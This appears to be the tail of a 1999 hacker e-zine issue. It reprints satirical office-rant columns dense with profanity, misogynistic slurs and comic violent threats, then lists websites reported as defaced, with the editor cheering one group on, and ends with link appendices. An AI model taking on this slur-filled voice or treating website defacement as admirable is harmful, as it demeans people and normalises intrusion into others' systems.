If I ever see you within even six feet of the coffee machine I'll Bruce Lee on your sorry ass. Mister Coffee, he my man. 'Cause only I know the perfect
proportion: two and three eighths scoops of Folgers to three and one quarter cups of water. Ain't no use trying to do it yourself 'cause you'll just fuck it up; only I can
do it right. 'Cause I got Kung Fu Grip. You got a problem with that? I got a problem with your existence, motherfucker. I was fucking your mother while you were
still watching Fat Albert in yo' Underoos.
I don't answer to nobody. One day I be blastin' the phat beats, and the company president come up to me and say, "Herbert, the Muzak is too loud, please turn
down the receiver." I say, "I need my tunes when I be preparing account statements." Then he say, "I don't care, turn it down, it's distracting." So you know what I
do? After he leaves for the day I steal a shitload of mints from his desk. He gets the message, and he don't give me no trouble no more. I be fucking his wife on the
sly, anyhow.
So don't fuck with this H-Dog Daddy Mack Mack Daddy Comin' Out Your Ass Badass, 'cause if you do I be comin' after you like pastrami on rye to whip
your muthafukin' sorry ass. I mean it. Don't. Fuck. With. Me.
------------------/---------------
Keep Your Fucking Shit Off My Desk
By Herbert Kornfeld
Accounts Receivable Supervisor
Yo, yo, yo, yo, yo, bruthahs 'n' sistahs. H-Dog here, His Stone Cold Baadness, The Original Gangsta, The Mack Daddy, The Freaky Gangbanga. And I got
somethin' to say to all y'all bitches out there: Keep yo' motherfuckin' shit offa my desk, or I'll fuck your sorry ass up wit' a quickness. And I don't want to see y'all
comin' around, puttin' your feet on it, neither. Or puttin' your goddamn coffee cups on it and leaving them fucked-up rings all upside the wood and shit.
'Cause I keep my fly shit on my desk. I gots my dope spreadsheets, my hangin' file folders, my delinquent-account file, my paper clips, my Post-It note
dispenser, my monthly desk planner, my Midstate Office Supply business cards, my four-color ball-point pen, my motherfuckin' dot-matrix printer address labels,
and my stoopid-fresh three-hole punch. Not to mention my computer. I swear, if I see any of y'all within three feet of my computer, I'll put a Lee Van Cleef on your
bitch ass. I'll come at you like a mother fuck.
I'm just trying to keep it real, know what I'm sayin'? I wanna stop the violence before it starts. I could say nothin' and wait in the shadows like some
motherfuckin' ninja, and when some punk-ass temp worker come along and start readin' my "Attitude Is A Little Thing That Makes A Big Difference" Successories
mouse pad, I could jump out and knock the sucka's teeth the fuck out. 'Cause that would be my right. A man's gotta protect what's his, right?
Take what happened just last week. Judy Metzger, this li'l skank-ass ho from Accounts Payable, be runnin' her ass around the office, puttin' cupcakes wit' the
goddamn smiley faces and shit on people's desks. I'm like, "Whus this smiley-face shit y'all be puttin' on my desk?" And she's like, "I made cupcakes for everyone in
the office last night!"
Now, I don't take shit from nobody, and I sure as hell don't take no shit from some bitch from Accounts Payable, so I picks up my letter opener and do some
crazy kung-fu shit on her. "Flag yo' ass outta here, bitch, and keep yo' fuckin' cupcake shit offa my fly desk."
She go runnin' out of the room and go gets her supervisor, Myron Schabe, from across the hall. Like I'm supposed to be scared of that. Myron older than shit
and he wear bow ties like he Pee Wee Muthafuckin' Herman or somethin'. So then he come up to my cubicle and say, "Herbert, I think there's been a
misunderstanding. It was Judy's turn this week to bring in a treat." I tell him I don't like no bitches from Accounts Payable puttin' no shit on my desk. But this Myron
fool keep pushin' it, tellin' me: "It was meant as a nicety, Herbert, nothing else. It's Co-Worker Appreciation Month, and everybody's scheduled to bring in a treat.
You yourself are signed up for next Wednesday."
So you know what I tell him? I says, "I ain't gonna be bringing in no motherfuckin' treat, motherfucker. Treats is for old ladies in the nursing home and shit. And
ain't nobody gonna be layin' they smiley-face bullshit on my dope fly desk. I gots everything where I want it, and ain't no little ho gonna be fuckin' it all up. So take
yo' bitch-ass, bow-tie self and get the fuck out of my cubicle before I cut you, beee-yaatch!"
After that, Myron walk out of there wit' his li'l dick between his legs. Ain't no Accounts Payable supervisor motherfucka gonna tell Herbert Kornfeld what to do.
And no one else, for that matter. You put shit on my desk, you just signed your death warrant. I mean it. Heads will get flown.
H-Dog out. And to all my homies in Accountz Reeceevable and the bruthahs kickin' it down in Shipping, keep ya heads up. Peace.
------------------/------------------
I Be The Real Employee Of The Month
By Herbert Kornfeld
Accounts Receivable Supervisor
Yo yo yo yo, whassssuuup, G's. H-Dog in tha house, and you'll pardon me if I dispense with the usual formalities, but I'm out for muthafuckin' REVENGE. You
see, some dirty cocksucka dared fuck with me, Tha Stone Cold Funky-Fresh Bad-Ass Of Accountz Reeceevable. I swear, before I sign out for lunch today I'm
gonna Hong Kong on that sorry fool's ass. I'm gonna cut him a permanent smile wit' my Letter Opener Of Death. I'm serious. Heads will get flown.
The shit came down yesterday morning, when Gerald Luckenbill, head comptroller at Midstate Office Supply, called a big-ass meeting to announce the
Employee Of Tha Month. I figure, this meetin' gonna be real short, 'cause everybody knows who be the best employee at Midstate Office Supply--ME. Hell, I
already got me so many Employee Of Tha Month plaques on my desk, I need a bigger muthafuckin' cubicle.
So you know what that bitch-ass Luckenbill do? He give the muthafuckin' Employee Of Tha Month plaque to muthafuckin' Phil Weinstein from customer
muthafuckin' service. Luckenbill say Weinstein got chosen because of "his outstanding service to the company and the gracious and courteous manner in which he
always treats the customers." That's bullshit, man. Weinstein only got chose Employee Of Tha Month 'cause his supervisor, Sandra Schumacher, wanna ride his
cock.
I don't need no dust-crotch supervisor ho wantin' to freak my ass, 'cause I be my own muthafuckin' supervisor, and I don't answer to nobody. I be the real
Employee Of Tha Month. Everybody think, ol' Herbert, he don't deserve no Employee Of Tha Month award. He ain't got no shit on nobody. But think again,
suckas.
Shit gets done when I'm around. Ain't nobody balance more spreadsheets in a pay period than me. I coordinate the second-shift check-processing schedule like
a mother fuck. Bills be sent. I even do shit I don't need to do. Like when Rose Powell, that head payroll bitch from Human Resources, quit, I helped that
department out, 'cause Human Resources manager Bob Cowan don't know shit about payroll and woulda fucked it all up. All this, and I'm goin' to night school. I be
just three credits away from my two-year accounting degree, and Midstate be payin' my tuition, besides.
If that all wasn't enough, the second-floor vendin' machine even stopped servin' up them nasty muthafuckin' nut rolls 'cause of me. You see, last Tuesday, the
man from Karlsen Vending came by to restock the vending machine, and I said to him, "You better stop loadin' this thing with them skank-ass Pearson's Nut Rolls if
you know what's good for you, cocksucka." And just like that, he stopped. Why? 'Cause he shit-scared of me. He knows I gots the Kung Fu grip. And I gots so
much dead presidents in my pocket from workin' all that overtime last Christmas season, when this fiscal year is through I'm gonna take me a long vacation and chill
out with some of my bitches in Branson, MO.
I'm so good, I even got this one motherfuckin' delinquent account that's been in our files for months to pay the fuck up. That's right. See, one day, I was readin'
the newspaper, and I saw this legal notice sayin' that the fucka who owed us all this cash was goin' bankrupt, and that any creditors who were owed money by him
had best make theyselves known wit' a quickness. So I tell that Luckenbill about it, he calls our lawyer, and, before you know it, Midstate Office Supply gets this
check for $4,130 in the mail. That bitch got wrote off. Uh huh. So when I says I superbad, I ain't just blowin' shit out my ass. H-Dog gots tha flava.
Luckenbill said he gonna recommend I get a raise for my swift resolvin' of that delinquent account, but I told him, "Don't do me no damn favors, L, 'cause I gots
me a score to settle." It's payback time for that Weinstein asshole. He ain't even been with the company a year, and he think he can hustle in on my award. Guess
again, punk. I'm gonna jump in my fly hoopty and run this cocksucka down like a fuckin' dog. Weinstein's eyes gonna be buggin' when he sees my 1981 Buick
Regal, a.k.a. Tha Nite Ridahh, comin' up on his sorry ass in the employee parking lot. Pow! I'm gonna take him out like I'm muthafuckin' Scarface, man.
Daddy H over and OUT. But before I go, I wanna send some shout-outs to my homies around the office, and all the other righteous folks who be down with the
H-Dog: my posse in Accountz Reeceevable, Gary, Linda, and Gladys; Ruth B. down in Inventory; tha Extra-Strength Disciples in Accounting; Janitor X; the whole
gang over at Snap-Rite Corporation, makers of funky-dope spreadsheets and fly file folders; them cafeteria bitches Theresa and Donna; and Principles Of
Accounting, Volume 4. Peace.
@HWA
SITE.1 www.interscape.403-security.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is a new website off the 403 server that is hosting the Interscape
group and their efforts to bringing you a site with helpful software and
original textfiles. Nice pleasing and easy to use layout, well worth a
look see, drop by and check it out.
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Looks like things are quieter than normal perhaps with all the FBI action thats
going down and groups getting raided some people are becoming a little antsy,
well heres the list for this week according to HNN...
From HNN rumours section, http://www.hackernews.com/
contributed by Anonymous
Cracked
Just a reminder that HNN has not been able to verify all
of the sites listed below. This is why they are listed in
the rumors section. Most of these sites (90%) where
allegedly cracked by the Portugal group F0rpaxe in
retaliation of recent FBI raids.
The following sites have been reported to HNN as
Cracked.
http://hanyang.ac.kr
http://lstc.edu
http://www.kingjunk.com
http://do-nt.8j.net
http://www.canada.org.mx
http://www.comicsexpress.com
http://www.matrixmerchant.com
http://www.phreaker.org
http://www.saratoganational.com
http://www.avaa.com
http://www.cafe.tg
http://www.sinadic.gov.ve
http://www.ncspca.org
http://www.nyshta.org
http://www.schroonlake.org
http://www.troop4.org
http://www.wakpominee.org
http://www.warrencounty.org
http://www.washingtoncounty.org
http://www.avaa.com
http://www.lonepenguin.com
http://www.michaelsgroup.com
http://www.microbanker.com
http://www.nomadmotel.com
http://www.nordicks.com
http://www.northcountryimports.com
http://www.ornamint.com
http://www.petdistributor.com
http://www.pornamerica.com
http://www.ramadainnalbany.com
http://www.rawlinsmotel.com
http://www.roaringbrookranch.com
http://www.saratoganational.com
http://www.schroonlakerealestate.com
http://www.scooperdoggie.com
http://www.seamscan.com
http://www.shelteredlakes.com
http://www.shopaviationmall.com
http://www.sunroomliving.com
http://www.surfsideonthelake.com
http://www.thefoodservicesite.com
http://www.theinnonthelibrarylawn.com
http://www.timmayer.com
http://www.tntsat.com
http://www.treasurecoveresort.com
http://www.valleypoolsandspas.com
http://www.villagerlg.com
http://www.wakitamotel.com
http://www.wakondacampground.com
http://www.jobdiscovery.org
http://www.swets.nl
http://www.sccm.edu
http://www.afjca891.com
http://www.albuquerquecars.com
http://www.arrowfinancial.com
http://www.astrowire.com
http://www.augustacars.com
http://www.bandbreservations.com
http://www.bitcastle.com
http://www.can-network.com
http://www.dutchessmotel.com
http://www.espey.com
http://www.fallsfarm.com
http://www.gfnational.com
http://www.hanlonspub.com
http://www.journeysendlodging.com
http://www.kokeinc.com
http://www.lakegeorgesteamboat.com
http://www.lakehouseonlakegeorge.com
http://www.leesmotel.com
http://www.lincolnlogs.com
http://www.mansionhill.com
http://www.netblue.com
http://www.networkofcommerce.com
http://www.newworldsales.com
http://www.steppingstonesresort.com
http://www.stillbay.com
http://www.xpandcorp.com
http://www.pingnet.com
http://www.omg.org
http://www.merco.com.mx
http://www.roland.net
http://www.virtuallyyours.net
http://www.cocacola.be
http://www.galoucura.com.br
http://www.jewel-world.com
http://www.relative-web.com
http://newsfeed.hollywood.com
http://www.aviationnetwork.com
http://coopra.inel.gov
http://nbcsun2.ios.doi.gov
June 2nd
From HNN's rumours section;
contributed by Anonymous
Cracked
The following web sites have been reported as Cracked.
http://www.legal-med.com
http://www.manateeisland.com
http://penny.educ.monash.edu.au
http://pestdata.ncsu.edu
http://www.aftenposten.no
http://www.bpfa.com
http://www.rapides.k12.la.us
http://policyworks.gov
http://ogp1.policyworks.gov
http://webcouncil.policyworks.go
http://y2k.policyworks.gov
http://www.bnl.gov
June 3rd
contributed by Anonymous
Cracked
The following sites have been reported to HNN as being cracked.
http://www.jabby.com
http://www.pinnacleleadership.com
http://ce.hannam.ac.kr
http://www.contourconstruction.com
http://www.mrc.twsu.edu
http://www.opamerica2.com
http://www.utneza.edu.mx
http://www.tomas98.org.mx
June 4th
contributed by Anonymous
Cracked
http://www.pocketstheclown.com
http://www.polskaszkola.com
http://www.cyber-n.net
http://newfort.tesser.com
http://www.intersky.com.mx
http://www.sco-servicios.com.mx
http://rsd.gsfc.nasa.gov
http://www.getwiredweb.com
http://www.cyts.com.cn
http://www.moviedom.com.cn
http://www.libo.com.cn
http://www.xfl.com.cn
http://www.zz.com.cn
http://www.chinabusiness.com.cn
http://www.ynst.net.cn
http://www.cscu.edu.cn
http://www.nwnu.edu.cn
http://www.gi.com.mx
http://www.decnet.com
http://www.win-shareware.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.genocide2600.com/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
<a href="http://www.trscene.org/">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
